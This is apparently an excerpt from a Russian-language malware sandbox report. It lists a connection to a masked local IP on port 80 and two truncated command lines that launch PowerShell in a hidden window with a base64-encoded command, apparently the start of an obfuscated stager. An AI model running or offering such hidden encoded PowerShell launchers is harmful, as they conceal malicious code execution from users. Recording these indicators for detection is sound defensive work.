Техническая информация
- '<LOCALNET>.0.130':80
- '%WINDIR%\syswow64\cmd.exe' /C START /B powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAHIAUwBJAE8ATgBUAGEAQgBsAEUALgBQAFMAVgBlAFIAcwBpAE8AbgAuAE0AQQBKAG8AcgAgAC0ARwBFACAAMwApAHsAJABHAFAARgA9AFsAUgBlAEYAXQAuAEEAUwBzA...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /C START /B powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAHIAUwBJAE8ATgBUAGEAQgBsAEUALgBQAFMAVgBlAFIAcwBpAE8AbgAuAE0AQQBKAG8AcgAgAC0ARwBFACAAMwApAHsAJABHAFAARgA9AFsAUgBlAEYAXQAuAEEAUwBzA...